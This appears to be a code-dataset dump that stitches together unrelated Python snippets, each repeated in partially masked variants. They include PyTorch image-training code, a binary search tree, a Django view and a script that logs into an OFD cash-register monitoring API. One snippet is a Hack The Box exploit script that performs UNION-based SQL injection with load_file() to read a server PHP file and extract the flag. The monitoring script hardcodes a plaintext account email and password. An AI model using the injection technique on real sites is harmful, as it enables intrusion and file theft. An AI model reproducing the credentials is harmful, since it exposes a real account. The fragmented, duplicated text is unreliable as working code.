test_exists = os.path.exists(test_path)
if test_exists:
test_df = csv_from_path(test_path,tr_path)
test_df.to_csv(os.path.join(data_path,self.test_name+'.csv'),index=False)
ret = (self.tr_name+'.csv',self.val_name+'.csv',self.test_name+'.csv')
return ret
def get_data(self, data_dict = None, s = (224,224), dataset = my_image_csv_dataset, bs = 32, balance = False, tfms = None,
bal_tfms = None, tta = False, num_workers = 4, stats_percentage = 0.6):
self.image_size = s
if not data_dict:
data_dict = self.data_dict
data_dfs,data_dir,minorities,class_diffs,obj,multi_label = (data_dict['data_dfs'],data_dict['data_dir'],data_dict['minorities'],
data_dict['class_diffs'],data_dict['obj'],data_dict['multi_label'])
if obj or multi_label:
balance = False
if tta:
tta_tfms = {self.tr_name: transforms.Compose(
[
# transforms.TenCrop(s),
transforms.FiveCrop(s[0]),
transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops:torch.stack(
[transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))
]),
self.val_name: transforms.Compose(
[
# transforms.TenCrop(s),
transforms.FiveCrop(s[0]),
transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops:torch.stack(
[transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))
]),
self.test_name: transforms.Compose(
[
# transforms.TenCrop(s),
transforms.FiveCrop(s[0]),
transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])),
transforms.Lambda(lambda crops:torch.stack(
[transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops]))
])}
# tta_tfms = {self.tr_name: transforms.Compose([
# transforms.Resize(s),
# transforms.ToTensor(),
# transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
# ]),
# self.val_name: transforms.Compose([
# transforms.Resize(s),
# transforms.ToTensor(),
# transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
# ]) }
else:
tta_tfms = None
if not bal_tfms:
bal_tfms = { self.tr_name: [transforms.RandomHorizontalFlip()],
self.val_name: None,
self.test_name: None
}
else:
bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.test_name: None}
if obj:
resize_transform = transforms.Resize(s)
else:
# resize_transform = transforms.RandomResizedCrop(s[0])
resize_transform = transforms.Resize(s)
if not tfms:
tfms = [
resize_transform,
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]
else:
tfms_temp = [
resize_transform,
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]
tfms_temp[1:1] = tfms
tfms = tfms_temp
print(tfms)
data_transforms = {
self.tr_name: tfms,
self.val_name: [
# transforms.Resize(s[0]+50),
# transforms.CenterCrop(s[0]),
transforms.Resize(s),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
],
self.test_name: [
# transforms.Resize(s[0]+50),
# transforms.CenterCrop(s[0]),
transforms.Resize(s),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]
}
temp_tfms = [resize_transform, transforms.ToTensor()]
temp_dataset = dataset(os.path.join(data_dir,self.tr_name),data_dfs[self.tr_name],temp_tfms)
self.img_mean,self.img_std = get_img_stats(temp_dataset,stats_percentage)
data_transforms[self.tr_name][-1].mean,data_transforms[self.tr_name][-1].std = self.img_mean,self.img_std
data_transforms[self.val_name][-1].mean,data_transforms[self.val_name][-1].std = self.img_mean,self.img_std
data_transforms[self.test_name][-1].mean,data_transforms[self.test_name][-1].std = self.img_mean,self.img_std
if balance:
image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x],
data_transforms[x],obj,minorities,class_diffs,bal_tfms[x])
for x in [self.tr_name, self.val_name, self.test_name]}
else:
image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x],
data_transforms[x],obj)
for x in [self.tr_name, self.val_name, self.test_name]}
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=bs,
shuffle=True, num_workers=num_workers)
for x in [self.tr_name, self.val_name, self.test_name]}
dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name, self.val_name, self.test_name]}
self.image_datasets,self.dataloaders,self.dataset_sizes = (image_datasets,dataloaders,
dataset_sizes)
return image_datasets,dataloaders,dataset_sizes
def imshow(self,inp, title=None):
"""Imshow for Tensor."""
inp = self.denorm_img(inp)
plt.imshow(inp)
if title:
plt.title(title)
plt.pause(0.001)
def denorm_img(self,inp,calculate = False):
inp = inp.numpy().transpose((1, 2, 0))
if calculate:
mean = np.mean(inp)
std = np.std(inp)
else:
mean = self.img_mean.numpy()
std = self.img_std.numpy()
inp = std * inp + mean
inp = np.clip(inp, 0, 1)
return inp
def show_data(self,folder_name = 'train', size = (64,64), bs = 5):
self.get_data(size,bs)
batch = next(iter(self.dataloaders[folder_name]))
inputs, classes = batch[0],batch[1]
out = torchvision.utils.make_grid(inputs)
if self.reg:
print(classes)
self.imshow(out, title=[x for x in classes])
elif self.multi_label:
self.imshow(out, title=[self.class_names[np.nonzero(x.type(torch.LongTensor))] for x in classes])
else:
self.imshow(out, title=[self.class_names[x] for x in classes])
# def set_up_object_detection(self,anc_grids,anc_zooms,anc_ratios,num_colr = 12):
# # print('Would you like to give your own values for anchor_grids, anchor_zooms,and anchor_ratios? The default values are: {}, {} and {}'
# # .format(anc_grids,anc_zooms,anc_ratios))
# # print('If so, you may call the function "set_up_object_detection" with your own paramteres.')
# cmap = get_cmap(num_colr)
# self.colr_list = [cmap(float(x)) for x in range(num_colr)]
# self.num_colr = num_colr
# self.create_anchors(anc_grids,anc_zooms,anc_ratios)
# self.custom_head = SSD_MultiHead(self.k,self.num_classes,0.45,-4.)
# self.loss_f = FocalLoss(self.num_classes)
# def create_anchors(self,anc_grids,anc_zooms,anc_ratios):
# anchor_scales = [(anz*i,anz*j) for anz in anc_zooms for (i,j) in anc_ratios]
# k = len(anchor_scales)
# anc_offsets = [1/(o*2) for o in anc_grids]
# anc_x = np.concatenate([np.repeat(np.linspace(ao, 1-ao, ag), ag)
# for ao,ag in zip(anc_offsets,anc_grids)])
# anc_y = np.concatenate([np.tile(np.linspace(ao, 1-ao, ag), ag)
# for ao,ag in zip(anc_offsets,anc_grids)])
# anc_ctrs = np.repeat(np.stack([anc_x,anc_y], axis=1), k, axis=0)
# anc_sizes = np.concatenate([np.array([[o/ag,p/ag] for i in range(ag*ag) for o,p in anchor_scales])
# for ag in anc_grids])
# grid_sizes = torch.tensor(np.concatenate([np.array(
# [ 1/ag for i in range(ag*ag) for o,p in anchor_scales])
# for ag in anc_grids])).float().unsqueeze(1).to(self.device)
# anchors = torch.tensor(np.concatenate([anc_ctrs, anc_sizes], axis=1)).float().to(self.device)
# anchor_cnr = hw2corners(anchors[:,:2], anchors[:,2:])
# self.anchors,self.anchor_cnr,self.grid_sizes,self.k = anchors,anchor_cnr,grid_sizes,k
| [
16,
18,
25,
28,
29
] |
81 | 64c32b3ada7fff51a7c4b07872b7688e100897d8 | <mask token>
class tree(object):
<mask token>
def insert(self, root, value):
if self.root == None:
self.root = Node(value)
elif value < root.data:
if root.left is None:
root.left = Node(value)
else:
self.insert(root.left, value)
elif value > root.data:
if root.right is None:
root.right = Node(value)
else:
self.insert(root.right, value)
return root
def delete(self, root, data, parent):
if root is None:
return root
if root.data < data:
parent = root
root.right = self.delete(root.right, data, parent)
elif root.data > data:
parent = root
root.left = self.delete(root.left, data, parent)
elif root is None or root.data != data:
return False
elif root.left is None and root.right is None:
if data > parent.data:
parent.right = None
root = None
else:
parent.left = None
root = None
elif root.left is None:
if data > parent.data:
parent.right = root.right
root = parent.right
else:
parent.left = root.right
root = parent.left
elif root.right is None:
if data > parent.data:
parent.right = root.right
root = parent.right
else:
parent.left = root.right
root = parent.right
else:
temp = self.successor(root.right)
root.data = temp.data
root.right = self.delete(root.right, temp.data, parent)
return root
<mask token>
def inorder(self, root):
if root is not None:
self.inorder(root.left)
print(root.data)
self.inorder(root.right)
<mask token>
| <mask token>
class tree(object):
def __init__(self):
self.root = None
def insert(self, root, value):
if self.root == None:
self.root = Node(value)
elif value < root.data:
if root.left is None:
root.left = Node(value)
else:
self.insert(root.left, value)
elif value > root.data:
if root.right is None:
root.right = Node(value)
else:
self.insert(root.right, value)
return root
def delete(self, root, data, parent):
if root is None:
return root
if root.data < data:
parent = root
root.right = self.delete(root.right, data, parent)
elif root.data > data:
parent = root
root.left = self.delete(root.left, data, parent)
elif root is None or root.data != data:
return False
elif root.left is None and root.right is None:
if data > parent.data:
parent.right = None
root = None
else:
parent.left = None
root = None
elif root.left is None:
if data > parent.data:
parent.right = root.right
root = parent.right
else:
parent.left = root.right
root = parent.left
elif root.right is None:
if data > parent.data:
parent.right = root.right
root = parent.right
else:
parent.left = root.right
root = parent.right
else:
temp = self.successor(root.right)
root.data = temp.data
root.right = self.delete(root.right, temp.data, parent)
return root
def successor(self, root):
temp = root
if root.right:
while temp.left:
temp = temp.left
return temp
def inorder(self, root):
if root is not None:
self.inorder(root.left)
print(root.data)
self.inorder(root.right)
<mask token>
| class Node(object):
def __init__(self, data):
self.data = data
self.left = None
self.right = None
self.parent = None
class tree(object):
def __init__(self):
self.root = None
def insert(self, root, value):
if self.root == None:
self.root = Node(value)
elif value < root.data:
if root.left is None:
root.left = Node(value)
else:
self.insert(root.left, value)
elif value > root.data:
if root.right is None:
root.right = Node(value)
else:
self.insert(root.right, value)
return root
def delete(self, root, data, parent):
if root is None:
return root
if root.data < data:
parent = root
root.right = self.delete(root.right, data, parent)
elif root.data > data:
parent = root
root.left = self.delete(root.left, data, parent)
elif root is None or root.data != data:
return False
elif root.left is None and root.right is None:
if data > parent.data:
parent.right = None
root = None
else:
parent.left = None
root = None
elif root.left is None:
if data > parent.data:
parent.right = root.right
root = parent.right
else:
parent.left = root.right
root = parent.left
elif root.right is None:
if data > parent.data:
parent.right = root.right
root = parent.right
else:
parent.left = root.right
root = parent.right
else:
temp = self.successor(root.right)
root.data = temp.data
root.right = self.delete(root.right, temp.data, parent)
return root
def successor(self, root):
temp = root
if root.right:
while temp.left:
temp = temp.left
return temp
def inorder(self, root):
if root is not None:
self.inorder(root.left)
print(root.data)
self.inorder(root.right)
<mask token>
| class Node(object):
def __init__(self, data):
self.data = data
self.left = None
self.right = None
self.parent = None
class tree(object):
def __init__(self):
self.root = None
def insert(self, root, value):
if self.root == None:
self.root = Node(value)
elif value < root.data:
if root.left is None:
root.left = Node(value)
else:
self.insert(root.left, value)
elif value > root.data:
if root.right is None:
root.right = Node(value)
else:
self.insert(root.right, value)
return root
def delete(self, root, data, parent):
if root is None:
return root
if root.data < data:
parent = root
root.right = self.delete(root.right, data, parent)
elif root.data > data:
parent = root
root.left = self.delete(root.left, data, parent)
elif root is None or root.data != data:
return False
elif root.left is None and root.right is None:
if data > parent.data:
parent.right = None
root = None
else:
parent.left = None
root = None
elif root.left is None:
if data > parent.data:
parent.right = root.right
root = parent.right
else:
parent.left = root.right
root = parent.left
elif root.right is None:
if data > parent.data:
parent.right = root.right
root = parent.right
else:
parent.left = root.right
root = parent.right
else:
temp = self.successor(root.right)
root.data = temp.data
root.right = self.delete(root.right, temp.data, parent)
return root
def successor(self, root):
temp = root
if root.right:
while temp.left:
temp = temp.left
return temp
def inorder(self, root):
if root is not None:
self.inorder(root.left)
print(root.data)
self.inorder(root.right)
def main():
Tree = tree()
l = [50, 30, 20, 40, 70, 60, 80]
for item in l:
Tree.insert(Tree.root, item)
print(Tree.delete(Tree.root, 20, None))
print('inorder after deleting 20:')
print(Tree.inorder(Tree.root))
print(Tree.delete(Tree.root, 30, None))
print(Tree.delete(Tree.root, 50, None))
print(Tree.inorder(Tree.root))
<mask token>
| class Node(object):
def __init__(self,data):
self.data = data
self.left = None
self.right = None
self.parent = None
class tree(object):
def __init__(self):
self.root = None
def insert(self,root,value):
if self.root == None:
self.root = Node(value)
else:
if value < root.data:
if root.left is None:
root.left = Node(value)
else:
self.insert(root.left,value)
elif value > root.data:
if root.right is None:
root.right = Node(value)
else:
self.insert(root.right,value)
return root
def delete(self,root,data,parent):
if root is None:
return root
if root.data < data:
parent = root
root.right = self.delete(root.right,data,parent)
elif root.data > data :
parent = root
root.left = self.delete(root.left,data,parent)
else:
if root is None or root.data != data:
return False
elif root.left is None and root.right is None:
if data > parent.data:
parent.right = None
root = None
else:
parent.left = None
root = None
elif root.left is None:
if data > parent.data:
parent.right = root.right
root = parent.right
else:
parent.left = root.right
root = parent.left
elif root.right is None:
if data > parent.data:
parent.right = root.right
root = parent.right
else:
parent.left = root.right
root = parent.right
else:
temp = self.successor(root.right)
root.data = temp.data
root.right = self.delete(root.right,temp.data,parent)
return root
def successor(self,root):
temp = root
if root.right:
while temp.left:
temp = temp.left
return temp
def inorder(self,root):
if root is not None:
self.inorder(root.left)
print(root.data)
self.inorder(root.right)
def main():
Tree = tree()
l =[50,30,20,40,70,60,80]
for item in l:
Tree.insert(Tree.root,item)
print(Tree.delete(Tree.root,20,None))
print("inorder after deleting 20:")
print(Tree.inorder(Tree.root))
print(Tree.delete(Tree.root,30,None))
print(Tree.delete(Tree.root,50,None))
print(Tree.inorder(Tree.root))
main()
| [
4,
6,
8,
9,
11
] |
82 | 88ec9484e934ce27b13734ca26f79df71b7677e6 | <mask token>
| <mask token>
if len(sys.argv) < 2:
print('Syntax : python %s <port>') % str(sys.argv[0])
else:
print('-' * 55)
print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')
print('-' * 55)
r = requests.session()
port = str(sys.argv[1])
url = 'http://docker.hackthebox.eu:'
url = url + port
uri = '/portfolio.php?id=1'
url = url + uri
print('[*]SQLi Affected URI : %s') % uri
print('[*]Counting Columns')
for x in range(1, 20):
payload = ' order by %i --+' % x
nurl = url + payload
op = r.get(nurl)
soup = BeautifulSoup(op.text, 'html.parser')
soup = soup.find('p')
soup = str(soup)
size = len(soup.split())
print('[*]Page size at order by %s : %s') % (x, size)
if size < 36:
col = x - 1
break
print('-' * 55)
print('[*]Number of Columns : %d') % col
print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')
print("[*]Trying to read content of '/var/www/html/administrat/panel.php'")
upayload = ' union all select 1'
for x in range(2, col + 1):
x = str(x)
upayload = upayload + ',' + x
<mask token>
print('[*]Executing. : %s') % url
<mask token>
if op.find('2'):
print('[*]Column 2 is reflected')
print('[*]Injecting payloads in column 2....')
<mask token>
print('[*]Excecuting : %s') % url
<mask token>
print('-' * 55)
print('[*]Flag : %s') % op
| <mask token>
if len(sys.argv) < 2:
print('Syntax : python %s <port>') % str(sys.argv[0])
else:
print('-' * 55)
print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')
print('-' * 55)
r = requests.session()
port = str(sys.argv[1])
url = 'http://docker.hackthebox.eu:'
url = url + port
uri = '/portfolio.php?id=1'
url = url + uri
print('[*]SQLi Affected URI : %s') % uri
print('[*]Counting Columns')
for x in range(1, 20):
payload = ' order by %i --+' % x
nurl = url + payload
op = r.get(nurl)
soup = BeautifulSoup(op.text, 'html.parser')
soup = soup.find('p')
soup = str(soup)
size = len(soup.split())
print('[*]Page size at order by %s : %s') % (x, size)
if size < 36:
col = x - 1
break
print('-' * 55)
print('[*]Number of Columns : %d') % col
print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')
print("[*]Trying to read content of '/var/www/html/administrat/panel.php'")
upayload = ' union all select 1'
for x in range(2, col + 1):
x = str(x)
upayload = upayload + ',' + x
upayload = upayload + ' --+'
url = url + upayload
print('[*]Executing. : %s') % url
op = r.get(url)
op = str(op.text)
if op.find('2'):
print('[*]Column 2 is reflected')
print('[*]Injecting payloads in column 2....')
upayload = upayload.replace('2',
"load_file('/var/www/html/administrat/panel.php')")
url = 'http://docker.hackthebox.eu:' + port + uri + upayload
print('[*]Excecuting : %s') % url
op = r.get(url)
op = str(op.text)
op = re.search('HTB.*?<', op)
op = str(op.group())
op = op.replace('<', '')
print('-' * 55)
print('[*]Flag : %s') % op
| import requests
from bs4 import BeautifulSoup
import sys
import re
if len(sys.argv) < 2:
print('Syntax : python %s <port>') % str(sys.argv[0])
else:
print('-' * 55)
print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')
print('-' * 55)
r = requests.session()
port = str(sys.argv[1])
url = 'http://docker.hackthebox.eu:'
url = url + port
uri = '/portfolio.php?id=1'
url = url + uri
print('[*]SQLi Affected URI : %s') % uri
print('[*]Counting Columns')
for x in range(1, 20):
payload = ' order by %i --+' % x
nurl = url + payload
op = r.get(nurl)
soup = BeautifulSoup(op.text, 'html.parser')
soup = soup.find('p')
soup = str(soup)
size = len(soup.split())
print('[*]Page size at order by %s : %s') % (x, size)
if size < 36:
col = x - 1
break
print('-' * 55)
print('[*]Number of Columns : %d') % col
print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')
print("[*]Trying to read content of '/var/www/html/administrat/panel.php'")
upayload = ' union all select 1'
for x in range(2, col + 1):
x = str(x)
upayload = upayload + ',' + x
upayload = upayload + ' --+'
url = url + upayload
print('[*]Executing. : %s') % url
op = r.get(url)
op = str(op.text)
if op.find('2'):
print('[*]Column 2 is reflected')
print('[*]Injecting payloads in column 2....')
upayload = upayload.replace('2',
"load_file('/var/www/html/administrat/panel.php')")
url = 'http://docker.hackthebox.eu:' + port + uri + upayload
print('[*]Excecuting : %s') % url
op = r.get(url)
op = str(op.text)
op = re.search('HTB.*?<', op)
op = str(op.group())
op = op.replace('<', '')
print('-' * 55)
print('[*]Flag : %s') % op
| import requests
from bs4 import BeautifulSoup
import sys
import re
if len(sys.argv)<2:
print("Syntax : python %s <port>")%(str(sys.argv[0]))
else:
print('-'*55)
print("HTB WEB-CHALLENGE coded by ZyperX [Freelance]")
print('-'*55)
r=requests.session()
port=str(sys.argv[1])
url="http://docker.hackthebox.eu:"
url=url+port
uri="/portfolio.php?id=1"
url=url+uri
print("[*]SQLi Affected URI : %s")%(uri)
print("[*]Counting Columns")
for x in range(1,20):
payload=(" order by %i --+")%(x)
nurl=url+payload
op=r.get(nurl)
soup=BeautifulSoup(op.text,'html.parser')
soup=soup.find('p')
soup=str(soup)
size=len(soup.split())
print("[*]Page size at order by %s : %s")%(x,size)
if size < 36 :
col= x-1
break
print("-"*55)
print("[*]Number of Columns : %d")%(col)
print("[*]Web App Vulnerable with FILE PRIVILEGE SQLI")
print("[*]Trying to read content of \'/var/www/html/administrat/panel.php\'")
upayload=" union all select 1"
for x in range(2,col+1):
x=str(x)
upayload=upayload+","+x
upayload=upayload+" --+"
url=url+upayload
print("[*]Executing. : %s")%(url)
op=r.get(url)
op=str(op.text)
if op.find("2"):
print("[*]Column 2 is reflected");
print("[*]Injecting payloads in column 2....");
upayload=upayload.replace('2','load_file(\'/var/www/html/administrat/panel.php\')')
url="http://docker.hackthebox.eu:"+port+uri+upayload
print("[*]Excecuting : %s")%(url)
op=r.get(url)
op=str(op.text)
op=re.search("HTB.*?<",op)
op=str(op.group())
op=op.replace('<','')
print("-"*55)
print("[*]Flag : %s")%(op)
| [
0,
1,
2,
3,
4
] |
83 | cd2e03666a890d6e9ea0fcb45fe28510d684916d | <mask token>
def squeezed(client_name):
return client_name.replace('Индивидуальный предприниматель', 'ИП')
def get_kkm_filled_fn(max_fill=80):
LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'
API_URL = 'https://pk.platformaofd.ru/api/monitoring'
session = requests.Session()
print('-= подключение к серверу =-')
session.get(LOGIN_URL)
login_data = {'email': '[email protected]', 'password': 'smart620514',
'username': '[email protected]', 'phone': ''}
print('-= авторизация =-')
session.post(LOGIN_URL, data=login_data)
headers = {'Content-Type': 'application/json;charset=UTF-8'}
payload = (
'{"badgeId":17,"type":"terminal","filterValues":[],"withArchive":0}')
print('-= получение данных с сервера =-')
r = session.post(API_URL, data=payload, headers=headers)
data_from_api = r.json()
all_kkm_list = data_from_api['result']['data']
kkm_quanity = len(all_kkm_list)
print('-= обработка данных =-')
kkm_with_filled_fn = []
for kkm in all_kkm_list:
fn_used = int(kkm['fnSpaceUsed'].strip("'%"))
if fn_used >= max_fill:
kkm_with_filled_fn.append(kkm)
return kkm_with_filled_fn
<mask token>
| <mask token>
def squeezed(client_name):
return client_name.replace('Индивидуальный предприниматель', 'ИП')
def get_kkm_filled_fn(max_fill=80):
LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'
API_URL = 'https://pk.platformaofd.ru/api/monitoring'
session = requests.Session()
print('-= подключение к серверу =-')
session.get(LOGIN_URL)
login_data = {'email': '[email protected]', 'password': 'smart620514',
'username': '[email protected]', 'phone': ''}
print('-= авторизация =-')
session.post(LOGIN_URL, data=login_data)
headers = {'Content-Type': 'application/json;charset=UTF-8'}
payload = (
'{"badgeId":17,"type":"terminal","filterValues":[],"withArchive":0}')
print('-= получение данных с сервера =-')
r = session.post(API_URL, data=payload, headers=headers)
data_from_api = r.json()
all_kkm_list = data_from_api['result']['data']
kkm_quanity = len(all_kkm_list)
print('-= обработка данных =-')
kkm_with_filled_fn = []
for kkm in all_kkm_list:
fn_used = int(kkm['fnSpaceUsed'].strip("'%"))
if fn_used >= max_fill:
kkm_with_filled_fn.append(kkm)
return kkm_with_filled_fn
<mask token>
print(f'ККМ с заполненностью ФН выше {max_fill}%.')
for k in x:
print(
f"{k['fnSpaceUsed']:4} {k['deviceName'][:37]:39} {squeezed(k['clientName'])[:30]:31}"
)
| <mask token>
def squeezed(client_name):
return client_name.replace('Индивидуальный предприниматель', 'ИП')
def get_kkm_filled_fn(max_fill=80):
LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'
API_URL = 'https://pk.platformaofd.ru/api/monitoring'
session = requests.Session()
print('-= подключение к серверу =-')
session.get(LOGIN_URL)
login_data = {'email': '[email protected]', 'password': 'smart620514',
'username': '[email protected]', 'phone': ''}
print('-= авторизация =-')
session.post(LOGIN_URL, data=login_data)
headers = {'Content-Type': 'application/json;charset=UTF-8'}
payload = (
'{"badgeId":17,"type":"terminal","filterValues":[],"withArchive":0}')
print('-= получение данных с сервера =-')
r = session.post(API_URL, data=payload, headers=headers)
data_from_api = r.json()
all_kkm_list = data_from_api['result']['data']
kkm_quanity = len(all_kkm_list)
print('-= обработка данных =-')
kkm_with_filled_fn = []
for kkm in all_kkm_list:
fn_used = int(kkm['fnSpaceUsed'].strip("'%"))
if fn_used >= max_fill:
kkm_with_filled_fn.append(kkm)
return kkm_with_filled_fn
max_fill = 80
x = get_kkm_filled_fn(max_fill)
print(f'ККМ с заполненностью ФН выше {max_fill}%.')
for k in x:
print(
f"{k['fnSpaceUsed']:4} {k['deviceName'][:37]:39} {squeezed(k['clientName'])[:30]:31}"
)
| import requests
def squeezed(client_name):
return client_name.replace('Индивидуальный предприниматель', 'ИП')
def get_kkm_filled_fn(max_fill=80):
LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'
API_URL = 'https://pk.platformaofd.ru/api/monitoring'
session = requests.Session()
print('-= подключение к серверу =-')
session.get(LOGIN_URL)
login_data = {'email': '[email protected]', 'password': 'smart620514',
'username': '[email protected]', 'phone': ''}
print('-= авторизация =-')
session.post(LOGIN_URL, data=login_data)
headers = {'Content-Type': 'application/json;charset=UTF-8'}
payload = (
'{"badgeId":17,"type":"terminal","filterValues":[],"withArchive":0}')
print('-= получение данных с сервера =-')
r = session.post(API_URL, data=payload, headers=headers)
data_from_api = r.json()
all_kkm_list = data_from_api['result']['data']
kkm_quanity = len(all_kkm_list)
print('-= обработка данных =-')
kkm_with_filled_fn = []
for kkm in all_kkm_list:
fn_used = int(kkm['fnSpaceUsed'].strip("'%"))
if fn_used >= max_fill:
kkm_with_filled_fn.append(kkm)
return kkm_with_filled_fn
max_fill = 80
x = get_kkm_filled_fn(max_fill)
print(f'ККМ с заполненностью ФН выше {max_fill}%.')
for k in x:
print(
f"{k['fnSpaceUsed']:4} {k['deviceName'][:37]:39} {squeezed(k['clientName'])[:30]:31}"
)
| import requests
def squeezed (client_name):
return client_name.replace('Индивидуальный предприниматель', 'ИП')
def get_kkm_filled_fn(max_fill=80):
## возвращает список ККМ с заполнением ФН больше max_fill в %
LOGIN_URL = 'https://pk.platformaofd.ru/auth/login'
API_URL = 'https://pk.platformaofd.ru/api/monitoring'
session = requests.Session()
print('-= подключение к серверу =-')
session.get(LOGIN_URL)
login_data = {
'email': '[email protected]',
'password': 'smart620514',
'username': '[email protected]',
'phone':''}
print('-= авторизация =-')
session.post(LOGIN_URL, data=login_data)
# запрос всех ККМ, кроме архивных (headers обязательно !)
headers = {'Content-Type': 'application/json;charset=UTF-8'}
payload = '{"badgeId":17,"type":"terminal","filterValues":[],"withArchive":0}'
print('-= получение данных с сервера =-')
r = session.post (API_URL, data=payload, headers=headers)
data_from_api = r.json()
all_kkm_list = data_from_api['result']['data']
kkm_quanity = len(all_kkm_list)
print('-= обработка данных =-')
kkm_with_filled_fn = []
for kkm in all_kkm_list:
fn_used = int(kkm['fnSpaceUsed'].strip("'%"))
if fn_used >= max_fill:
kkm_with_filled_fn.append(kkm)
return kkm_with_filled_fn
max_fill = 80
x = get_kkm_filled_fn(max_fill)
print(f'ККМ с заполненностью ФН выше {max_fill}%.')
for k in x:
print(f"{k['fnSpaceUsed']:4} {k['deviceName'][:37]:39} {squeezed(k['clientName'])[:30]:31}")
| [
2,
3,
4,
5,
6
] |
84 | 709f2425bc6e0b0b650fd6c657df6d85cfbd05fe | <mask token>
| <mask token>
def test_petite_vue(request):
return render(request, 'petite_vue_app/test-form.html')
| from django.shortcuts import render
def test_petite_vue(request):
return render(request, 'petite_vue_app/test-form.html')
| from django.shortcuts import render
# Create your views here.
def test_petite_vue(request):
return render(request, 'petite_vue_app/test-form.html')
| null | [
0,
1,
2,
3
] |
85 | a4deb67d277538e61c32381da0fe4886016dae33 | <mask token>
class Net(nn.Module):
<mask token>
<mask token>
<mask token>
| <mask token>
for file in glob.glob('*.jpg'):
images.append(file)
<mask token>
for i in range(train_num + test_num):
tags = labels.iloc[i]['tags']
if i < train_num:
train_images.append(imageio.imread(images[i], as_gray=True).flatten())
train_labels.append(int('cloudy' not in tags and 'haze' not in tags))
else:
test_images.append(imageio.imread(images[i], as_gray=True).flatten())
test_labels.append(int('cloudy' not in tags and 'haze' not in tags))
class Net(nn.Module):
def __init__(self, input_size, hidden_size, num_classes):
super(Net, self).__init__()
self.h1 = nn.Linear(input_size, hidden_size)
self.h2 = nn.Linear(hidden_size, hidden_size_1)
self.h3 = nn.Linear(hidden_size_1, hidden_size_2)
self.h4 = nn.Linear(hidden_size_2, hidden_size_3)
self.o = nn.Linear(hidden_size_3, num_classes)
def forward(self, x):
x = torch.sigmoid(self.h1(x))
x = torch.sigmoid(self.h2(x))
x = torch.sigmoid(self.h3(x))
x = torch.sigmoid(self.h4(x))
x = torch.sigmoid(self.o(x))
return x
<mask token>
for epoch in range(num_epochs):
for i, image in enumerate(train_images):
image = torch.Tensor(train_images[i]).reshape(1, 65536)
label = torch.Tensor([int(train_labels[i])])
outputs = model(image)
outputs = outputs.squeeze(0)
loss = criterion(outputs, label)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if (i + 1) % 100 == 0:
print('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'.format(epoch +
1, num_epochs, i + 1, total_step, loss.item()))
with torch.no_grad():
correct = 0
total = 0
for i, image in enumerate(test_images):
image = torch.Tensor(test_images[i]).reshape(1, 65536)
label = torch.Tensor([int(test_labels[i])])
outputs = model(image)
outputs = outputs.squeeze(0)
outputs = 1 if torch.sum(outputs) >= 0.5 else 0
if outputs == torch.sum(label):
correct += 1
elif outputs == 0:
print('#############')
print(i, outputs, torch.sum(label))
print('Accuracy of the network on the {} test images: {} %'.format(len(
test_images), 100 * correct / len(test_images)))
torch.save(model.state_dict(), 'model.ckpt')
| <mask token>
fileDir = os.getcwd()
input_size = 65536
hidden_size = 20
hidden_size_1 = 15
hidden_size_2 = 10
hidden_size_3 = 5
num_classes = 1
learning_rate = 0.001
num_epochs = 5
train_num = 1000
test_num = 148
images = []
for file in glob.glob('*.jpg'):
images.append(file)
images = sorted(images, key=lambda filename: int(filename[6:-4]))
train_images = []
test_images = []
train_labels = []
test_labels = []
labels = pd.read_csv('./train_v2.csv')
for i in range(train_num + test_num):
tags = labels.iloc[i]['tags']
if i < train_num:
train_images.append(imageio.imread(images[i], as_gray=True).flatten())
train_labels.append(int('cloudy' not in tags and 'haze' not in tags))
else:
test_images.append(imageio.imread(images[i], as_gray=True).flatten())
test_labels.append(int('cloudy' not in tags and 'haze' not in tags))
class Net(nn.Module):
def __init__(self, input_size, hidden_size, num_classes):
super(Net, self).__init__()
self.h1 = nn.Linear(input_size, hidden_size)
self.h2 = nn.Linear(hidden_size, hidden_size_1)
self.h3 = nn.Linear(hidden_size_1, hidden_size_2)
self.h4 = nn.Linear(hidden_size_2, hidden_size_3)
self.o = nn.Linear(hidden_size_3, num_classes)
def forward(self, x):
x = torch.sigmoid(self.h1(x))
x = torch.sigmoid(self.h2(x))
x = torch.sigmoid(self.h3(x))
x = torch.sigmoid(self.h4(x))
x = torch.sigmoid(self.o(x))
return x
model = Net(input_size, hidden_size, num_classes)
criterion = nn.SoftMarginLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
total_step = len(train_images)
for epoch in range(num_epochs):
for i, image in enumerate(train_images):
image = torch.Tensor(train_images[i]).reshape(1, 65536)
label = torch.Tensor([int(train_labels[i])])
outputs = model(image)
outputs = outputs.squeeze(0)
loss = criterion(outputs, label)
